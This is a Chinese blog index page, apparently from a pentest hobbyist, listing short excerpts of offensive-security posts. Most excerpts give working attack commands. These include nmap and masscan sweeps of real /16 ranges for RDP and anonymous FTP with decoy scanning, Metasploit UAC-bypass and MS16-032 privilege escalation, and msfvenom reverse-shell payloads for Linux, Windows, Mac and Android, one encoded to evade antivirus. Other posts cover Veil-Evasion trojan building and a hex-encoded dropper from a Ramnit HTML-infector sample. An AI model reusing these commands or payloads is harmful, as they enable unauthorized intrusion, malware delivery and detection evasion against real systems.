- 博客(10)
- 收藏
- 关注
原创 MS12-020远程桌面协议RDP拒绝访问漏洞
漏洞名称:MS12-020远程桌面协议RDP拒绝访问漏洞 条件:受害者必须开放RDP协议 开放了3389端口 或者端口改了,知道对方RDP开放的对应端口。 1.nmap扫描某网段内开放3389端口的主机nmap -vv --open -p 3389 -Pn 60.10.0.0/16这一过程可以用其他扫描器如msscan代替>2.利用nmap中的ms12-020脚本批
2017-02-24 08:42:15 3049
原创 bypass UAC 提权
在meterpreter下getuidsysinfo 查看系统版本及相关信息(多少位)backgroundsearch bypassuac use exploit/windows/local/bypassuac_eventvwr 此exploit对win10 64位有效injection的对win10 32位的有效,对64位的无效set session ex
2017-02-24 08:37:09 1895
原创 veil-evasion 在xp下的三分之二免杀
1.apt-get install veil-evasion 2.List --查找相应的木马生成模块3.选择354.Options --查看需要设置的选项5.Set use_pyherion Y6.Generate7.选择1.msfvenom(defualt)8.设置本机ip10.10.10.128,端口44449.重命名木马xx.rc10.选择1pyins
2017-02-24 08:36:10 571
原创 msf生成安卓渗透
利用msf来hack android1.msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -o test.apk2.签名(可以不用)1.keytool -genkey -v -keystore my-release-key.keystore -alias pentest -keyalg R
2017-02-24 08:33:54 4225 1
原创 msfvenom反弹
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe Mac msfven
2017-02-24 08:32:36 897
原创 ms16_032系统提权
1.利用msfvenom生成木马msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 13 -b '\x00\xfff\x0a' lhost=10.10.10.128 --platform windows lport=443 -f exe >/root/test.exe2.在msf下开启监听use ex
2017-02-24 08:30:40 1499
原创 masscan+nmap批量获取FTP-anno
1.masscan -p 21 60.8.151.0/16 --rate=10000 输出扫描结果,下面交给nmap2.nmap -vvv --script ftp-anon -p 21 -D RND:100 -vvv -Pn -iL 21.txt -n -w -T4http://www.freebuf.com/sectool/112583.html masscan
2017-02-11 10:37:48 2481
原创 mysql 5.6安装与配置
http://jingyan.baidu.com/article/f3ad7d0ffc061a09c3345bf0.htmlhttp://jingyan.baidu.com/article/b24f6c82cba6dc86bfe5da9f.htmlhttp://rj.baidu.com/soft/detail/12585.html?ald
2016-11-03 19:58:39 424
原创 html感染型病毒
病毒种类:该病毒属于ramnit感染型病毒。中毒症状:会在html文件最后强制插入一下代码,并感染全盘html文档。DropFileName = "svchost.exe"WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000
2016-10-16 20:03:40 31510 3
转载 kali2.0密码重置:转自百度文库
启动你的Kali Linux,等出现GRUB引导菜单时,按向下方向键选择“恢复模式”,按E键进入编辑模式。进入编辑模式后,参照下图进行修改(将ro改为rw,在后面添加init=/bin/bash): 修改完成后,按F10键或Ctrl+X键继续启动。启动完成后,出现命令行界面。 这时输入passwd root,回车就可以直接设置新密
2016-10-14 00:44:02 572
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人